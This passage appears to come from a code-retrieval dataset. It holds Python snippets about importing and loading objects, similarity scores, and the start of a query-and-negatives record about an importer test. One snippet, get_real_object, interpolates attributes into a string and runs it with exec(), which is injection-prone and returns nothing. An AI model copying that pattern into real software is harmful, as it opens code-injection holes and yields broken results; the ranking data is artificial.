int(row['function']) in function_ids:\n # Ignore the links with unidentified origin,\n # destination or function.\n to_be_created.append(\n Link(user_id=id, name=row['name'],\n origin=node_mapping[int(row['origin'])],\n destination=node_mapping[int(row['destination'])],\n vdf=function_mapping[int(row['function'])],\n lanes=float(row['lanes']),\n length=float(row['length']),\n speed=float(row['speed']),\n capacity=float(row['capacity']))\n )\n if to_be_updated:\n if object_name in ('centroid', 'crossing'):\n values = set(query.values_list('user_id', 'name', 'x', 'y'))\n elif object_name == 'function':\n values = set(query.values_list('user_id', 'name', 'expression'))\n elif object_name == 'link':\n values = set(query.values_list('user_id', 'name', 'origin',\n 'destination', 'vdf_id', 'lanes',\n 'length', 'speed', 'capacity'))\n # Find the instances that really need to be updated (the values have\n # changed).\n to_be_updated = to_be_updated.difference(values)\n if object_name in ('centroid', 'crossing', 'function'):\n # Update the objects (it would be faster to delete and re-create\n # them but this would require to also change the foreign keys of\n # the links).\n for values in to_be_updated:\n # Index 0 of values is the id column i.e. the user_id.\n instance = query.filter(user_id=values[0])\n if object_name in ('centroid', 'crossing'):\n instance.update(name=values[1], x=values[2], y=values[3])\n else: # Function\n instance.update(name=values[1], expression=values[2])\n elif object_name == 'link':\n # Delete the links and re-create them.\n ids = list(query.values_list('id', 'user_id'))\n # Create a mapping between the user ids and the ids.\n id_mapping = dict()\n for i in range(len(values)):\n id_mapping[ids[i][1]] = ids[i][0]\n # Retrieve the ids of the links to be updated with the mapping and\n # delete them.\n to_be_updated_ids = [id_mapping[values[0]]\n for values in to_be_updated]\n with connection.cursor() as cursor:\n chunk_size = 20000\n chunks = [\n to_be_updated_ids[x:x + chunk_size]\n for x in range(0, len(to_be_updated_ids), chunk_size)\n ]\n for chunk in chunks:\n # Delete the relations first.\n cursor.execute(\n \"DELETE FROM Network_Link \"\n \"WHERE link_id IN %s;\",\n [chunk]\n )\n cursor.execute(\n \"DELETE FROM Link \"\n \"WHERE id IN %s;\",\n [chunk]\n )\n # Create a mapping between the id and the instance of the\n # functions.\n function_mapping = dict()\n for function in functions:\n function_mapping[function.id] = function\n # Now, create the updated instances with the new values.\n to_be_created += [\n Link(user_id=values[0], name=values[1], origin=values[2],\n destination=values[3], vdf=function_mapping[values[4]],\n lanes=values[5], length=values[6], speed=values[7],\n capacity=values[8])\n for values in to_be_updated\n ]\n # Create the new objects in bulk.\n # The chunk size is limited by the MySQL engine (timeout if it is too big).\n chunk_size = 10000\n chunks = [to_be_created[x:x + chunk_size]\n for x in range(0, len(to_be_created), chunk_size)]\n # Remove the orphan instances.\n if object_name == 'function':\n query.model.objects \\\n .exclude(functionset__in=FunctionSet.objects.all()) \\\n .delete()\n else:\n query.model.objects.exclude(network__in=Network.objects.all()).delete()\n for chunk in chunks:\n # Create the new instances.\n query.model.objects.bulk_create(chunk, chunk_size)\n # Retrieve the newly created instances and add the many-to-many\n # relation.\n # Add the many-to-many relation.\n if object_name == 'function':\n new_instances = query.model.objects \\\n .exclude(functionset__in=FunctionSet.objects.all())\n for instance in new_instances:\n instance.functionset.add(parent)\n else:\n new_instances = query.model.objects \\\n .exclude(network__in=Network.objects.all())\n for instance in new_instances:\n instance.network.add(parent)\n simulation.has_changed = True\n simulation.save()\n return HttpResponseRedirect(\n reverse('metro:object_list', args=(simulation.id, object_name,))\n )\n except Exception as e:\n print(e)\n context = {\n 'simulation': simulation,\n 'object': object_name,\n }\n return render(request, 'metro_app/import_error.html', context)", "def test_dependent_object_import(self):\n # Initialize Importers\n up_manager = ImporterManager(importer=UserProfileImporter())\n company_manger = ImporterManager(importer=CompanyImporter())\n user_manager = ImporterManager(importer=UserImporter())\n\n # Populate leaf models of dependency tree with kv data\n for row,name in enumerate(self.usernames):\n user_manager.update_kvs(field_name='username', value=name, row=row)\n company_manger.update_kvs(field_name='natural_id', value=self.company.natural_id, row=row)\n\n #: Retrieve data associated with kv data\n user_manager.get_available_rows()\n company_manger.get_available_rows()\n\n #: Populate data up the dependency tree with retrieved rows\n for row in range(self.n_objs):\n up_manager.update_kvs('company', company_manger.get_object_or_list(row), row=row)\n up_manager.update_kvs('user', user_manager.get_object_or_list(row), row=row)\n\n #: Retrieve data associated with models depended upon\n up_manager.get_available_rows()\n\n #: Test corresponding UserProfile has been returned\n for row in range(self.n_objs):\n objs = up_manager.get_objs_and_meta(row) #: Returns a list of objects only if manytomany, o/w just 1\n\n self.assertEqual(objs[0].available, True)\n self.assertIsNotNone(objs[0].object)\n self.assertIsInstance(objs[0].object, UserProfile)\n self.assertIsNotNone(objs[0].query)\n\n self.assertEqual(objs[0].object.user.username, self.usernames[row])", "def test_twice_dependent_object_import(self):\n pass", "def load_data(self):", "def _load_objects(self):\n self._get_package()\n\n object_names = [name for name in dir(self._sdk) if name != \"GATDLSession\" and name != \"SDKInfo\" and name.startswith(\"GA\") and not name.endswith(\"Fetcher\")]\n\n for object_name in object_names:\n obj = getattr(self._sdk, object_name)\n self._objects_mapping[obj.rest_name] = object_name", "def import_from(self, importer=None):\n if not importer:\n raise aspecd.exceptions.MissingImporterError(\"No importer provided\")\n importer.import_into(self)\n self._origdata = copy.deepcopy(self.data)", "def _load(self):\n raise NotImplementedError()", "def load(self):\n pass", "def load(self):\n pass", "def load(self):\n pass", "def load(self):\n pass", "def import_manager(path: str) -> Donald:\n manager: Donald = import_obj(path)\n return manager", "def _load_objects():\n global DataArray, DataFrame, Series, Index, ndarray\n ndarray = np.ndarray\n DataArray = getattr(sys.modules.get('xarray', None), 'DataArray', ndarray)\n DataFrame = getattr(sys.modules.get('pandas', None), 'DataFrame', ndarray)\n Series = getattr(sys.modules.get('pandas', None), 'Series', ndarray)\n Index = getattr(sys.modules.get('pandas', None), 'Index', ndarray)", "def __init__(self, loader):\n self.loader = loader\n self.models = []", "def load_data(self) -> None:", "def GetDataAsObject(self):", "def load_data(self):\n raise NotImplementedError()", "def load(self):\n return", "def init_from_entity(self, entity):\r\n\r\n if entity.type.lower() == '1_static_mesh':\r\n return UnrealImporter(entity, StaticImportTaskStrategy(),\r\n AssetExecuteTaskStrategy())\r\n\r\n elif entity.type.lower() == '2_skeletal_mesh':\r\n return UnrealImporter(entity, SkeletalImportTaskStrategy(),\r\n AssetExecuteTaskStrategy())\r\n\r\n else:\r\n raise NotImplementedError('No implementation for the \"{}\" file type'.format(entity.type))", "def load(self):\n raise NotImplementedError", "def load(self):\n raise NotImplementedError", "def get_object(path='', obj=None):\n if not path:\n return obj\n path = path.split('.')\n if obj is None:\n obj = importlib.import_module(path[0])\n path = path[1:]\n for item in path:\n if isinstance(obj, types.ModuleType):\n submodule = '{}.{}'.format(_package(obj), item)\n try:\n obj = importlib.import_module(submodule)\n except Exception as import_error:\n try:\n obj = getattr(obj, item)\n except:\n # FIXME: I know I should probably merge the errors, but\n # it's easier just to throw the import error since\n # it's most probably the one user wants to see.\n # Create a new LoadingError and throw a combination\n # of the import error and attribute error.\n raise import_error\n else:\n obj = getattr(obj, item)\n return obj", "def load(self):\n\n raise NotImplementedError", "def load(self):\n raise NotImplementedError()", "def load(self):\n raise NotImplementedError()", "def __iter__(self) -> Iterator:\n return iter(self.get_data_loader())", "def import_object(self):\r\n try:\r\n msg = f\"[sphinxcontrib-matlabdomain] MatlabDocumenter.import_object {self.modname=}, {self.objpath=}, {self.fullname=}.\"\r\n logger.debug(msg)\r\n if len(self.objpath) > 1:\r\n lookup_name = \".\".join([self.modname, self.objpath[0]])\r\n lookup_name = lookup_name.lstrip(\".\")\r\n obj = entities_table[lookup_name]\r\n self.object = self.get_attr(obj, self.objpath[1])\r\n else:\r\n lookup_name = self.fullname.lstrip(\".\")\r\n self.object = entities_table[lookup_name]\r\n return True\r\n # this used to only catch SyntaxError, ImportError and AttributeError,\r\n # but importing modules with side effects can raise all kinds of errors\r\n except Exception:\r\n if self.objpath:\r\n errmsg = (\r\n \"[sphinxcontrib-matlabdomain] Failed to import %s %r from module %r\"\r\n % (self.objtype, \".\".join(self.objpath), self.modname)\r\n )\r\n else:\r\n errmsg = \"[sphinxcontrib-matlabdomain] Failed to import %s %r\" % (\r\n self.objtype,\r\n self.fullname,\r\n )\r\n errmsg += (\r\n \"; the following exception was raised:\\n%s\" % traceback.format_exc()\r\n )\r\n logger.warning(errmsg)\r\n self.env.note_reread()\r\n return False", "def load(self):", "def map_data(self, obj: object):\n pass", "def extra_object_files(self):", "def _setup_object(self) -> object:\n raise NotImplementedError", "def load_model(self) -> Any:", "def _fetch_data(self):\n pass", "def get_external_data(self, cr, uid, conn, external_referential_id, defaults=None, context=None):\n return self.mage_import_base(cr, uid, conn, external_referential_id, defaults, context)#TODO refactor mage_import_base calls to this interface", "def import_data_helper(self): \n if len(self.components) == 1:\n hapi.fetch(TableName = self.tablename, M = self.components[0][0], I = self.components[0][1], numin = self.min_x, numax = self.max_x)\n else: \n global_id = []\n for c in self.components:\n global_id.append(hapi.ISO[c][0])\n hapi.fetch_by_ids(TableName = self.tablename, iso_id_list = global_id, numin = self.min_x, numax = self.max_x)", "def process_import_resource(self, resource):\n return resource", "def import_object(name: str) -> Any:\n if name.count(\".\") == 0:\n return __import__(name)\n\n parts = name.split(\".\")\n obj = __import__(\".\".join(parts[:-1]), fromlist=[parts[-1]])\n try:\n return getattr(obj, parts[-1])\n except AttributeError:\n raise ImportError(\"No module named %s\" % parts[-1])", "def load(self, *args, **kwargs):\n pass", "def dataloader(self):\n return DataLoader", "def get_data():\n pass", "def _init_loaders(self):\n @self.loaders_wrapper(\"nx2nx\")\n def get_nx2nx_loader(extractor, stream, transformers, graph):\n \"\"\"\n :param tranformers: List of dicts.\n :extractor: function.\n :param graph: networkx.Graph\n :returns: projx.nx_loader\n \"\"\"\n return loaders.nx2nx_loader(extractor, stream, transformers,\n self.loader_json[self.loader_name],\n graph)\n\n @self.loaders_wrapper(\"neo4j2nx\")\n def get_neo4j2nx_loader(extractor, stream, transformers, graph):\n \"\"\"\n :param tranformers: List of dicts.\n :extractor: function.\n :param graph: networkx.Graph\n :returns: projx.nx_loader\n \"\"\"\n return loaders.neo4j2nx_loader(extractor, stream, transformers,\n self.loader_json[self.loader_name],\n graph)\n\n\n @self.loaders_wrapper(\"neo4j2edgelist\")\n def get_neo4j2edgelist_loader(extractor, stream, transformers, graph):\n \"\"\"\n :param tranformers: List of dicts.\n :extractor: function.\n :param graph: networkx.Graph\n :returns: projx.nx_loader\n \"\"\"\n return loaders.neo4j2edgelist_loader(\n extractor,\n stream,\n transformers,\n self.loader_json[self.loader_name],\n graph\n )\n\n\n @self.loaders_wrapper(\"edgelist2neo4j\")\n def get_edgelist2neo4j_loader(extractor, stream, transformers, graph):\n \"\"\"\n :param tranformers: List of dicts.\n :extractor: function.\n :param graph: networkx.Graph\n :returns: projx.nx_loader\n \"\"\"\n return loaders.edgelist2neo4j_loader(\n extractor,\n stream,\n transformers,\n self.loader_json[self.loader_name],\n graph\n )", "def import_info(self):\n return self.setup.import_info", "def load(self):\n return None", "def _get_data(self):\n raise NotImplementedError()", "def test_partial_twice_dependent_object_import(self):\n pass", "def import_result(self) -> ImportedResult:\n raw_data = self._read_data(self.path)\n processed_data = self._process_data(raw_data)\n return self._create_result(raw_data, processed_data)", "def get_additional_data(self, object, object_type):\n if self.cartographer_client:\n return self.get_cartographer_data(object)", "def get_data(self):\n pass", "def get_data(self):\n pass", "def load_data(self):\n super(MudderyObjectCreater, self).load_data()\n \n data = self.get_data_record()\n if not data:\n return\n \n # set common object's info\n self.obj_list = {}\n\n for obj in data.obj_list.split(\",\"):\n obj_key = \"\"\n number = 0\n arg = obj.split(\":\", 1)\n if len(arg) == 1:\n obj_key = arg[0]\n number = 1\n elif len(arg) >= 2:\n obj_key = arg[0]\n number = int(arg[1])\n\n self.obj_list[obj_key] = number", "def ReadObject(self, *args, **kwargs):\n pass", "def get_external(self, _module_name: str) -> \"ImportRecord\":\n return self", "def loader(self):\n return self._loader", "def test_dataloader(self) -> DataLoader:\n return self._custom_data_loader()", "def preload(self):\n # load the objects\n for otype, fname in self.TYPE2NAME.items():\n if fname:\n path = os.path.join(self.anodir, fname + \".gz\")\n if os.path.isfile(path):\n with gzip.open(path, \"rt\") as handler:\n for line in handler:\n omap = json.loads(line)\n cls = self.TYPE2CLASS[otype]\n item = cls.from_map(omap, self)\n self.caches[otype][item.id] = item", "def load_data(ctx, klass=None):\n if klass:\n if klass and not klass.startswith(\"public_data.models\"):\n klass = f\"public_data.models.{klass}\"\n options = {\"class\": klass}\n connecter = ScalingoInterface(ctx.obj)\n connecter.manage_py(\"load_data\", **options)", "def get_data(self):\r\n pass", "def _read_data(self) -> MMD:\n\t\tif self.config.source_type == SourceType.LOCAL_FILE:\n\t\t\treturn self._read_files()\n\t\telif self.config.source_type == SourceType.HDFS:\n\t\t\treturn self._read_hdfs()\n\t\telif self.config.source_type == SourceType.NEO4J:\n\t\t\treturn self._read_neo4j(self.config.graph_db)\n\n\t\telse:\n\t\t\traise NotImplementedError(\"The source type {} has not been implemented yet.\".format(loader_config.source_type))", "def _load(self) -> dict:\n raise NotImplementedError()", "def LoadDefinition(cls, metadata_object):\n pass", "def import_single_object(self, content_object):\n ct = ContentType.objects.get_for_model(content_object)\n object_id = content_object.id\n return self.import_all_ci([ct], asset_id=object_id)", "def test_m2m_dependent_object_import(self):\n user_profile: UserProfile = self.user_profiles[0] # See self.setUp()\n\n # ************ First Handle generating the Tags/Images Synthetically Through the Importer ************\n # Initialize Importers\n image_manager = ImporterManager(importer=ImageImporter())\n tag_manager = ImporterManager(importer=TagImporter())\n up_manager = ImporterManager(importer=UserProfileImporter())\n company_manger = ImporterManager(importer=CompanyImporter())\n user_manager = ImporterManager(importer=UserImporter())\n\n # Populate leaf models of dependency tree with kv data\n for row,image in enumerate(self.images):\n user_manager.update_kvs(field_name='username', value=user_profile.user.username, row=row)\n company_manger.update_kvs(field_name='natural_id', value=self.company.natural_id, row=row)\n\n #: Retrieve data associated with kv data\n user_manager.get_available_rows()\n company_manger.get_available_rows()\n\n #: Populate data up the dependency tree with retrieved rows\n for row,image in enumerate(self.images):\n up_manager.update_kvs('company', company_manger.get_object_or_list(row), row=row)\n up_manager.update_kvs('user', user_manager.get_object_or_list(row), row=row)\n\n #: Retrieve data associated with models depended upon\n up_manager.get_available_rows()\n\n tag_manager.update_kvs('slug', 'blue', row=0, col=0)\n tag_manager.update_kvs('slug', 'green', row=0, col=1)\n tag_manager.update_kvs('company', company_manger.get_object_or_list(0), row=0, col=0)\n tag_manager.update_kvs('created_by', up_manager.get_object_or_list(0), row=0, col=0)\n\n tag_manager.update_kvs('slug', 'yellow', row=1, col=0)\n tag_manager.update_kvs('company', company_manger.get_object_or_list(1), row=1, col=0)\n tag_manager.update_kvs('created_by', up_manager.get_object_or_list(1), row=1, col=0)\n\n #: Retrieve associate intermediate data\n tag_manager.get_available_rows()\n\n for row,image in enumerate(self.images):\n image_manager.update_kvs('path', image.path, row=row)\n image_manager.update_kvs('name', image.name, row=row)\n image_manager.update_kvs('tag', tag_manager.get_object_or_list(row), row=row)\n image_manager.update_kvs('company', company_manger.get_object_or_list(row), row=row)\n\n image_manager.get_available_rows()\n\n self.assertNotEqual(image_manager.get_object_or_list(0), [])\n self.assertIsInstance(image_manager.get_object_or_list(0), Image)\n\n self.assertNotEqual(image_manager.get_object_or_list(1), [])\n self.assertIsInstance(image_manager.get_object_or_list(1), Image)", "def load_item(self, location):\r\n assert isinstance(location, Location)\r\n json_data = self.module_data.get(location)\r\n if json_data is None:\r\n module = self.modulestore.get_item(location)\r\n if module is not None:\r\n # update our own cache after going to the DB to get cache miss\r\n self.module_data.update(module.runtime.module_data)\r\n return module\r\n else:\r\n # load the module and apply the inherited metadata\r\n try:\r\n category = json_data['location']['category']\r\n class_ = self.load_block_type(category)\r\n\r\n\r\n definition = json_data.get('definition', {})\r\n metadata = json_data.get('metadata', {})\r\n for old_name, new_name in getattr(class_, 'metadata_translations', {}).items():\r\n if old_name in metadata:\r\n metadata[new_name] = metadata[old_name]\r\n del metadata[old_name]\r\n\r\n children = [\r\n location.course_key.make_usage_key_from_deprecated_string(childloc)\r\n for childloc in definition.get('children', [])\r\n ]\r\n data = definition.get('data', {})\r\n if isinstance(data, basestring):\r\n data = {'data': data}\r\n mixed_class = self.mixologist.mix(class_)\r\n data = self._convert_reference_fields_to_keys(mixed_class, location.course_key, data)\r\n metadata = self._convert_reference_fields_to_keys(mixed_class, location.course_key, metadata)\r\n kvs = MongoKeyValueStore(\r\n data,\r\n children,\r\n metadata,\r\n )\r\n\r\n field_data = KvsFieldData(kvs)\r\n scope_ids = ScopeIds(None, category, location, location)\r\n module = self.construct_xblock_from_class(class_, scope_ids, field_data)\r\n if self.cached_metadata is not None:\r\n # parent container pointers don't differentiate between draft and non-draft\r\n # so when we do the lookup, we should do so with a non-draft location\r\n non_draft_loc = location.replace(revision=None)\r\n\r\n # Convert the serialized fields values in self.cached_metadata\r\n # to python values\r\n metadata_to_inherit = self.cached_metadata.get(non_draft_loc.to_deprecated_string(), {})\r\n inherit_metadata(module, metadata_to_inherit)\r\n # decache any computed pending field settings\r\n module.save()\r\n return module\r\n except:\r\n log.warning(\"Failed to load descriptor\", exc_info=True)\r\n return ErrorDescriptor.from_json(\r\n json_data,\r\n self,\r\n location,\r\n error_msg=exc_info_to_str(sys.exc_info())\r\n )", "def ImportFromMojom(self, import_name):\n import_file = self._graph.files[import_name]\n import_module = module.Module()\n self.PopulateModuleMetadata(import_module, import_file)\n\n import_item = {\n 'module_name': import_module.name,\n 'namespace': import_module.namespace,\n 'module': import_module,\n }\n return import_item", "def _import(self, datadict):\n self.GUID = datadict.get(\"GUID\", uuid.uuid1())\n self.FileName = datadict.get(\"FileName\", \"\")\n self.Name = datadict.get(\"Name\", \"\")\n self.Projects = datadict.get(\"Projects\", [])\n self.VSVersion = datadict.get(\"VSVersion\", None)", "def load_data():\n\n if global_deserializer is None:\n raise SystemExit('global de-serializer was not set')\n\n return global_deserializer(input())", "def load_objects(self, queue):\n pass", "def __init__(self, **kwargs):\n DataLoader.__init__(self, **kwargs)", "def _load(self):\n\n # This can happen when the object is not loaded yet\n # Usually when __init__ calls super().__init__()\n # and OrderSource starts initializing the instance attributes\n if not hasattr(self, \"_data\"):\n return\n\n if self._data is None:\n try:\n self._data = self.storage.load(basket=self)\n except BasketCompatibilityError as error:\n msg = _(\"Basket loading failed: Incompatible basket (%s).\")\n messages.error(self.request, msg % error)\n self.storage.delete(basket=self)\n self._data = self.storage.load(basket=self)\n self.dirty = False\n self.uncache()\n return self._data", "def test_get_imports(self):\n pass", "async def load(self) -> None:\n pass", "def load_input(self, setup=None, **kwargs):\n if not isinstance(setup, ResultImportSetup):\n setup = ResultImportSetup(**kwargs)\n self.setup = setup", "def load_model(self):\n pass", "def load(self):\n for name, item in itertools.chain(\n self._cal_objs.items(),\n self._noise_objs.items()):\n logger.debug(\"load {}\".format(item))\n item.load()", "def get(self):\n return getattr(self, 'import_{type}'.format(type=self.type))()", "def _get_or_create_data_loader(\n cls, root: 'Any', model: 'Any', info: 'ResolveInfo', args: dict\n ) -> ModelLoader:\n context: 'Union[dict, object]' = info.context\n\n if isinstance(context, dict):\n try:\n data_loaders = context[cls.dataloaders_field]\n except KeyError:\n data_loaders = {}\n context[cls.dataloaders_field] = data_loaders\n\n else:\n data_loaders = getattr(context, cls.dataloaders_field, None)\n if data_loaders is None:\n data_loaders = {}\n setattr(info.context, cls.dataloaders_field, data_loaders)\n\n # Unique dataloader key for context.\n data_loader_key = tuple((p for p in info.path if isinstance(p, str)))\n\n try:\n current_data_loader: ModelLoader = data_loaders[data_loader_key]\n except KeyError:\n current_data_loader = ModelLoader(type(root), model, info, args)\n data_loaders[data_loader_key] = current_data_loader\n\n return current_data_loader", "def manage_importObject(self, file, REQUEST=None, set_owner=1,\n suppress_events=False):\n dirname, file = os.path.split(file)\n if dirname:\n raise BadRequest('Invalid file name %s' % html.escape(file, True))\n\n for impath in self._getImportPaths():\n filepath = os.path.join(impath, 'import', file)\n if os.path.exists(filepath):\n break\n else:\n raise BadRequest(\n 'File does not exist: %s' %\n html.escape(\n file, True))\n\n imported = self._importObjectFromFile(\n filepath, verify=bool(REQUEST), set_owner=set_owner,\n suppress_events=suppress_events)\n getId = getattr(aq_base(imported), \"getId\", None) # aq wrapped\n id = imported.getId() if getId is not None else imported.id\n if getattr(id, '__func__', None) is not None:\n id = id()\n\n if REQUEST is not None:\n return self.manage_main(\n self,\n REQUEST,\n manage_tabs_message='\"%s\" successfully imported' % id,\n title='Object imported',\n update_menu=1\n )", "def import_init(self, request):\n for channel in request.channels:\n self.sync_channel(channel)\n\n logging.info('[IMPORT Completed')\n\n importer = Importer()\n\n return importer", "def test_importObject(self):\n created = Time()\n\n obj1 = MemoryObject(hash=u'sha256',\n contentDigest=u'9aef0e119873bb0aab04e941d8f76daf21dedcd79e2024004766ee3b22ca9862',\n content=u'blahblah some data blahblah',\n created=created,\n contentType=u'application/octet-stream')\n obj2 = self.successResultOf(self.contentStore.importObject(obj1))\n self.assertEquals(obj1.objectId, obj2.objectId)\n self.assertEquals(obj1.created, obj2.created)\n self.assertEquals(obj1.contentType, obj2.contentType)\n self.assertEquals(\n self.successResultOf(obj1.getContent()),\n self.successResultOf(obj2.getContent()))", "def import_object(import_str, *args, **kwargs):\r\n return import_class(import_str)(*args, **kwargs)", "def __init__(self):\n if DynamicImporter._instance is not None:\n raise Exception(\"DynamicImporter instance already exists!\")\n DynamicImporter._instance = self\n\n current_path = Path(__file__).parent\n test_path = current_path / \"testdata\"\n files = test_path.rglob(\"*.py\")\n\n for file in files:\n\n if file.name in [\"__init__.py\", \"test_module.py\", \"test_registry.py\", \"connections.py\"]:\n continue\n\n name = file.stem\n module = import_module(f\"testdata.{name}\")\n class_title = f\"{name.title()}Test\"\n\n try:\n _class = getattr(module, class_title) # get the class\n self.class_list[class_title] = _class # add the class to the class list\n except AttributeError: # don't throw exceptions for files that don't have a test\n continue", "def load(self):\n self._really_load()", "def __init__(self):\n # Define class API\n self.api = API2()\n # Initialize a list of SAVED_OBJECTS (used in get_ancestors)\n self.SAVED_OBJECTS = []\n # Initialize the total number of objects\n self.total = 0\n # Load saved objects from file to continue the last execution\n self.load_saved_objects()", "def load(self, *args, **kwargs) -> Any:\n pass", "def load_data(self, read_shelf):\n if read_shelf:\n try:\n # Attempt reading pre-shelved objects first\n self.__read_shelf()\n except Exception as e:\n print(f'Exception while reading the data shelf ({e})')\n # Otherwise, read data from the the json files\n self.__read_json()\n else:\n self.__read_json()", "def get_external(self: _R, module_name: str) -> _R:\n return self\n # source = ImportString(module_name) + self._local_source\n # return ImportRecord(\n # source=source,\n # name=self.name,\n # alias=self.alias,\n # )", "def load_model_custom(file, object):\n return getattr(load_module(file), object)", "def _parse_import_data(self, data, import_fields, options):\n return self._parse_import_data_recursive(self.model_id.model, '', data, import_fields, options)", "def get_data(self):", "def fetch(self):\n pass", "def fetch(self):\n pass", "def load(cls, data):\n if isinstance(data, dict):\n print('>>> dict')\n else:\n print('>>> obj')\n # cls_fields = fields(cls)\n init()", "def get_data(self):\n \n with os.scandir(self.file_path) as collection_of_files:\n files_found = [file.name.split('.')[0] for file in collection_of_files \n if (file.name.split('.')[0].lower().strip() in self._data_requirements.required_file_names \n and file.name.endswith('.csv'))]\n\n self.check_missing_files(files_found)\n \n self._data = DictObjectView(self.read_in_files(files_found))", "def fetch_data(self):", "def __init__(self, pe_manager):\n self.PE = pe_manager.PE\n self.structures = self.PE.__structures__\n self.pe_manager = pe_manager\n self.import_entries = pe_manager.PE.DIRECTORY_ENTRY_IMPORT\n self.import_structures = pe_manager.get_import_structures()\n\n self._origin_import_section = None\n self._new_import_section = None\n\n self.count_of_additional_fn = 0\n self.count_of_additional_dll = 0", "def get_real_object(self):\n query_string = dedent(f\"\"\"\\\n import app.config.models_importer as models_importer\n\n class_ = models_importer.all_models['{self.ref_class}']\n \n class_.query.get({self.ref_id})\"\"\")\n\n return exec(query_string)" ]
[ "0.64458275", "0.62757504", "0.61903095", "0.6175268", "0.59833163", "0.5957138", "0.5917701", "0.58304566", "0.58275753", "0.58036554", "0.57879543", "0.5749467", "0.5749467", "0.5749467", "0.5749467", "0.57487833", "0.574654", "0.5720211", "0.5711407", "0.5699259", "0.568944", "0.5674899", "0.56277996", "0.56134474", "0.56134474", "0.5578263", "0.55717766", "0.5551767", "0.5551767", "0.5550796", "0.554159", "0.5536571", "0.5493893", "0.5483714", "0.5478652", "0.54778296", "0.54671407", "0.5435622", "0.54141086", "0.54073584", "0.5403959", "0.54008156", "0.5392692", "0.5389972", "0.53779143", "0.5377601", "0.5362641", "0.5356067", "0.53513056", "0.5349289", "0.53480864", "0.5343676", "0.5343676", "0.533862", "0.53375155", "0.5337119", "0.5328579", "0.5319471", "0.5313904", "0.5313398", "0.5300392", "0.5291771", "0.52869296", "0.52864015", "0.5273982", "0.52735204", "0.5266864", "0.5261938", "0.5256396", "0.5255226", "0.5246751", "0.52388126", "0.52287996", "0.5225514", "0.52249134", "0.5217472", "0.5213655", "0.52079886", "0.5204111", "0.5203374", "0.5188796", "0.5187711", "0.5185142", "0.51813424", "0.5171923", "0.517101", "0.51695496", "0.5166924", "0.516649", "0.5156933", "0.5146862", "0.51463366", "0.5136931", "0.5132984", "0.5132984", "0.51317155", "0.5125215", "0.512438", "0.5116907", "0.5113758" ]
0.5439921
37
Given object without dependency, use it's importerManager to get available data, and assert that after deleting a given user, we can still query the metadata returned by the ImporterManger
def test_partial_nondependent_object_get(self): MISSING_INDEX = 2 User.objects.filter(username=self.usernames[MISSING_INDEX]).delete() manager = ImporterManager(importer=UserImporter()) for row,name in enumerate(self.usernames): manager.update_kvs(field_name='username',value=name,row=row) manager.get_available_rows() for i in range(self.n_objs): objs: List[RecordData] = manager.get_objs_and_meta(i) #: Returns a list of objects only if manytomany if i==MISSING_INDEX: self.assertEqual(objs[0].available, False) self.assertIsNone(objs[0].object) self.assertIsNotNone(objs[0].query) continue self.assertEqual(objs[0].available, True) self.assertIsNotNone(objs[0].object) self.assertIsInstance(objs[0].object, User) self.assertIsNotNone(objs[0].query) del manager
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_nondependent_object_get(self):\n manager = ImporterManager(importer=UserImporter())\n for row,name in enumerate(self.usernames):\n manager.update_kvs(field_name='username',value=name,row=row)\n\n manager.get_available_rows()\n for i in range(self.n_objs):\n objs: List[RecordData] = manager.get_objs_and_meta(i) #: Returns a list of objects only if manytomany\n self.assertEqual(objs[0].available, True)\n self.assertIsNotNone(objs[0].object)\n self.assertIsInstance(objs[0].object, User)\n self.assertIsNotNone(objs[0].query)\n\n del manager", "def test_dependent_object_import(self):\n # Initialize Importers\n up_manager = ImporterManager(importer=UserProfileImporter())\n company_manger = ImporterManager(importer=CompanyImporter())\n user_manager = ImporterManager(importer=UserImporter())\n\n # Populate leaf models of dependency tree with kv data\n for row,name in enumerate(self.usernames):\n user_manager.update_kvs(field_name='username', value=name, row=row)\n company_manger.update_kvs(field_name='natural_id', value=self.company.natural_id, row=row)\n\n #: Retrieve data associated with kv data\n user_manager.get_available_rows()\n company_manger.get_available_rows()\n\n #: Populate data up the dependency tree with retrieved rows\n for row in range(self.n_objs):\n up_manager.update_kvs('company', company_manger.get_object_or_list(row), row=row)\n up_manager.update_kvs('user', user_manager.get_object_or_list(row), row=row)\n\n #: Retrieve data associated with models depended upon\n up_manager.get_available_rows()\n\n #: Test corresponding UserProfile has been returned\n for row in range(self.n_objs):\n objs = up_manager.get_objs_and_meta(row) #: Returns a list of objects only if manytomany, o/w just 1\n\n self.assertEqual(objs[0].available, True)\n self.assertIsNotNone(objs[0].object)\n self.assertIsInstance(objs[0].object, UserProfile)\n self.assertIsNotNone(objs[0].query)\n\n self.assertEqual(objs[0].object.user.username, self.usernames[row])", "def test_data_object_untrash(self):\n pass", "def test_data_object_del(self):\n pass", "def test_delete_object(self):\n u = self.d.user('example')\n u.delete()\n\n method, url, data, headers = self.d._fetcher.last_request\n self.assertEqual(method, 'DELETE')\n self.assertEqual(url, '/users/example')", "def test_delete(self):\n storage = FileStorage()\n obj_dict = storage.all()\n usr = User()\n usr.id = 12345\n storage.new(usr)\n storage.delete(usr)\n key = usr.__class__.__name__ + \".\" + str(usr.id)\n self.assertFalse(key in obj_dict.keys())", "def test_import_process(self):\r\n good_file = self._get_del_file()\r\n imp = Importer(good_file, username=u\"admin\")\r\n imp.process()\r\n\r\n # now let's do some db sanity checks\r\n self._delicious_data_test()", "def test_project_get_deleted_upon_user_delete(self):\n\n project = django_dynamic_fixture.get(Project)\n user1 = django_dynamic_fixture.get(User)\n project.users.add(user1)\n\n project.refresh_from_db()\n assert project.users.all().count() == 1\n\n # Delete the user\n user1.delete()\n # The object should not exist\n project = Project.objects.all().filter(id=project.id)\n assert not project.exists()", "def test_that_when_dataset_is_deleted_the_account_is_still_there(self):\n test_dataset = Dataset.objects.get(\n dataset_slug=\"google-geojson-example\")\n test_dataset.delete()\n with self.assertRaises(ObjectDoesNotExist):\n Dataset.objects.get(dataset_slug=\"google-geojson-example\")\n Account.objects.get(account_slug=\"test_user\")", "def test_delete(self):\n\n self.metadata.create_or_update(data=self.create)\n\n # Find by name\n res_name = self.metadata.get_by_name(\n entity=Dashboard, fqn=self.entity.fullyQualifiedName\n )\n # Then fetch by ID\n res_id = self.metadata.get_by_id(\n entity=Dashboard, entity_id=str(res_name.id.__root__)\n )\n\n # Delete\n self.metadata.delete(\n entity=Dashboard, entity_id=str(res_id.id.__root__), recursive=True\n )\n\n # Then we should not find it\n res = self.metadata.list_entities(entity=Dashboard)\n assert not next(\n iter(\n ent\n for ent in res.entities\n if ent.fullyQualifiedName == 